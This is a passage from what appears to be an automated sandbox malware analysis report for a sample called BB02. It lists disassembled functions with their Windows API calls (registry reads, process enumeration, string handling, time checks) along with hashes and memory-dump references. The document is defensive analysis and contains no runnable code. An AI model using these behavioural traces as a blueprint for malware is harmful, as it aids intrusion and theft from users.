Part of subcall function 024F5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 024F5F04
Part of subcall function 024F5E47: lstrcat.KERNEL32(00000000,00000000), ref: 024F5F0F
Part of subcall function 024F5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 024F5F37

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$FolderPathlstrcat
String ID:
API String ID: 2938889746-0
Opcode ID: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
Instruction ID: f81ee2bdac098f4ec674a107ecfdca8d169f11eda60d5db8f6bf6453d40ae351
Opcode Fuzzy Hash: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
Instruction Fuzzy Hash: D6F16F71E002058FDB64DF29C844A59BBB2BF89318F19C1AED9099B3A1D735ED42CF91

Function 024F7A84 Relevance: 7.9, APIs: 5, Instructions: 365stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 024F79D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 024F7AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F7AE7
lstrcpy.KERNEL32(00000000,?), ref: 024F7B44
StrCmpCA.SHLWAPI(?,00638D84), ref: 024F7DE4

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
Instruction ID: bf40f86254875cb1d70d91341225567a37b065b4814c72298e29d0454a190298
Opcode Fuzzy Hash: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
Instruction Fuzzy Hash: 07F16F71E002058FDB64DF29C844A59BBB2BF89318F19C1AED9099B3A1D735ED42CF91

Function 024E9F37 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 024E9F6F
LocalAlloc.KERNEL32(00000040,?), ref: 024E9FA1
StrStrA.SHLWAPI(00000000,004351E8), ref: 024E9FCA
memcmp.MSVCRT(?,0042DC44,00000005), ref: 024EA003

Strings

, xrefs: 024EA02C

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpymemcmp
String ID:
API String ID: 4154055062-3916222277
Opcode ID: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
Instruction ID: 0b08701b70173077333444158ce4082e766d841efba4298b7305890cba5aec93
Opcode Fuzzy Hash: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
Instruction Fuzzy Hash: 2E419171A002659BEF10EF75CC40AAF77B6AF45306F04456AED16A7392DB70AD01CF91

Function 0250965F Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 02509697
GetCPInfo.KERNEL32(?,?), ref: 025096AA
memset.MSVCRT ref: 025096C2
setSBUpLow.LIBCMT ref: 02509798

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: 111c3c07fb09bc6f5b37efe096d1c8aea2b28741611527557449d701e77a25d6
Instruction ID: 1935652470568c97b2a1d07f43d56b05cc0c41c6d443194b5b8b3151d407e9fc
Opcode Fuzzy Hash: 111c3c07fb09bc6f5b37efe096d1c8aea2b28741611527557449d701e77a25d6
Instruction Fuzzy Hash: 64312861A042864BD7258F74CCD4379BFA0BF42714F0849AED991DB1DBC329D406C759

Function 00421B00 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00421E28), ref: 00421B52

Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
Part of subcall function 00421800: lstrlenA.KERNEL32(00A15F80,00000000,00000000,?,?,00421B61), ref: 00421840
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
Part of subcall function 00421800: lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F

sscanf.NTDLL ref: 00421B7A
SystemTimeToFileTime.KERNEL32(?,?), ref: 00421B96
SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BA6
ExitProcess.KERNEL32 ref: 00421BC3

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
String ID:
API String ID: 3040284667-0
Opcode ID: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
Instruction ID: 74431add482d266e5f481d4c3f26529432deb7ac332c40e3c7ddf6828a7bb522
Opcode Fuzzy Hash: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
Instruction Fuzzy Hash: BD2102B1508301AF8344EF69D88485BBBF9EFD8304F409A1EF5A9C3220E774E5048FA6

Function 02503337 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0250336D
RtlAllocateHeap.NTDLL(00000000), ref: 02503374
RegOpenKeyExA.ADVAPI32(80000002,006389D4,00000000,00020119,?), ref: 02503393
RegQueryValueExA.ADVAPI32(?,00638CEC,00000000,00000000,00000000,000000FF), ref: 025033AE
RegCloseKey.ADVAPI32(?), ref: 025033B8

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
Instruction ID: e1b7508c180697176220938bde47af0d5c8022bcaa28b57bcfca7e3f1c95c15d
Opcode Fuzzy Hash: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
Instruction Fuzzy Hash: 97118272A04204AFD714CB94EC45FABBB7DFB48711F00411AFA05D3280DB7459048BE1

Function 00406E30 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 00406E40
memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
HeapAlloc.KERNEL32(00000000), ref: 00406EBB

Strings

@, xrefs: 00406E30

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocProcess
String ID: @
API String ID: 1643994569-2766056989
Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
Instruction ID: b28c2e2eafd009aece7dfa75dd6d3a6e0d6a1e6899dabcaa8fc792e54f3dbcc7
Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
Instruction Fuzzy Hash: 9C1161706007129BEB258B61DC84BB773E4EB40701F454439EA47DB684FFB8D950CB99

Function 02502B17 Relevance: 7.5, APIs: 5, Instructions: 49registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02502B2C
RtlAllocateHeap.NTDLL(00000000), ref: 02502B33
RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02502AB0), ref: 02502B52
RegQueryValueExA.ADVAPI32(02502AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 02502B6C
RegCloseKey.ADVAPI32(02502AB0), ref: 02502B76

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction ID: a4cb38cc9b607de2a24558dcbf80ecf590c6f0e454afeb2d19935f447d67c396
Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction Fuzzy Hash: F3019A75A00318AFE314CBA09C99FEB7BA9AB49755F200098FE45D7281EB7059088BA0

Function 024E1267 Relevance: 7.5, APIs: 5, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 024E127C
RtlAllocateHeap.NTDLL(00000000), ref: 024E1283
RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024E12A0
RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024E12BA
RegCloseKey.ADVAPI32(?), ref: 024E12C4

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction ID: b13c36f8bb739cb2da7b1e9ce85122e998456ab43a9e86ad6288cb954e39ddbc
Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction Fuzzy Hash: 79F09075A40308BFE7049BA09C4DFEB7B7DEB04755F100059BE09E6280D7B05A048BE0

Function 02509268 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02509274

Part of subcall function 02508A96: __getptd_noexit.LIBCMT ref: 02508A99
Part of subcall function 02508A96: __amsg_exit.LIBCMT ref: 02508AA6

__getptd.LIBCMT ref: 0250928B
__amsg_exit.LIBCMT ref: 02509299
__lock.LIBCMT ref: 025092A9
__updatetlocinfoEx_nolock.LIBCMT ref: 025092BD

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
Instruction ID: 21d87e1a0e753df77138efdb50d18e7b21d26cf83682188182396b1a780b2e3b
Opcode Fuzzy Hash: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
Instruction Fuzzy Hash: D2F0BE329087039BD720BB79DC85B4DB7A2BF88B20F100109E455A76C6DB64AA009F6E

Function 00423E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124stringtimeCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
lstrcpy.KERNEL32(00000000,00A187B0), ref: 00423E6F
GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79

Strings

*M@, xrefs: 00423EEE, 00423EDD

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$SystemTime
String ID: *M@
API String ID: 684065273-4186991356
Opcode ID: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
Instruction ID: b70439790c50c5c6328432dc7e4028cf2044113f60d486d5e56dbf02b5324992
Opcode Fuzzy Hash: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
Instruction Fuzzy Hash: 76418D31E012158FDB14CF29E984666BBF5FF08315B4A80AAE845DB3A2C779DD42CF94

Function 00417CA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00417D14
std::_Xinvalid_argument.LIBCPMT ref: 00417D2F
memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,004091B6,?,?,?,?,00000000,?,00001000,?), ref: 00417D84

Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417E11
Part of subcall function 00417DC0: memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74

Strings

string too long, xrefs: 00417D0F, 00417D2A

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
Instruction ID: cceaebfc163d96aa0f8494b9eac0357faa14b69c3768ea23588e1796d2ee1bc6
Opcode Fuzzy Hash: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
Instruction Fuzzy Hash: 0F31E5723086148BD7249E6CF880ABBF7F9EF91764B204A2BF14687741D775988183ED

Function 024FF247 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 024FF27A
StrCmpCA.SHLWAPI(?,ERROR), ref: 024FF295
lstrcpy.KERNEL32(00000000,ERROR), ref: 024FF2F6

Strings

ERROR, xrefs: 024FF28F, 024FF2F0

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
Instruction ID: f3548e5696f8bba8175e95a54b5699b0a96d843b8f553db7fede8aa00bba90a9
Opcode Fuzzy Hash: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
Instruction Fuzzy Hash: FF2130706101965FEF64FF79CC44E9E3BE9AF4430AF01442AE94ADBA81DB75D804CB90

Function 00408740 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408767

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

Strings

yxxx, xrefs: 00408771
vector<T> too long, xrefs: 00408762
yxxx, xrefs: 00408749

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx
API String ID: 2884196479-1517697755
Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction ID: e0d1b7fbc79543eee78ba1c3596c29abb19376f5ed5f905b3ee67b4588712001
Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction Fuzzy Hash: 74F09027B100310BC314A43E9E8405FA94657E539037AD77AE986FF38DEC39EC8281D9

Function 024FC347 Relevance: 6.4, APIs: 5, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024FC387

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
Instruction ID: 8a84bb8f0f88bc78f15e3855ab169649d7561d94883a40fd34cfec6836b58ed3
Opcode Fuzzy Hash: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
Instruction Fuzzy Hash: 8D31BFB0E002599BEF10EFB5CC88A6E7BFAAF84309F04406BD901A7251D7B4C901DF94

Function 024FF077 Relevance: 6.3, APIs: 5, Instructions: 93stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024FF0A6
lstrlen.KERNEL32(00000000), ref: 024FF0B4
lstrcpy.KERNEL32(00000000,00000000), ref: 024FF0DB
lstrlen.KERNEL32(00000000), ref: 024FF0E2
lstrcpy.KERNEL32(00000000,00435550), ref: 024FF116

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
Instruction ID: 20a5d4d1e951e5f304d33a7be27ba72def2e66efece1643faed43545829c4c8c
Opcode Fuzzy Hash: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
Instruction Fuzzy Hash: 0B31B471A001955FEB21FF39DC84E9E7BAAAF40309F01442AED06DBA52DB64DC05DF94

Function 02503C57 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

Part of subcall function 02507477: lstrcpy.KERNEL32(00000000,ERROR), ref: 02507495

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02503C9D
Process32First.KERNEL32(00000000,00000128), ref: 02503CB0
Process32Next.KERNEL32(00000000,00000128), ref: 02503CC6

Part of subcall function 025075A7: lstrlen.KERNEL32(------,024E5D82), ref: 025075B2
Part of subcall function 025075A7: lstrcpy.KERNEL32(00000000), ref: 025075D6
Part of subcall function 025075A7: lstrcat.KERNEL32(?,------), ref: 025075E0

Part of subcall function 02507517: lstrcpy.KERNEL32(00000000), ref: 02507545

CloseHandle.KERNEL32(00000000), ref: 02503DFE

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

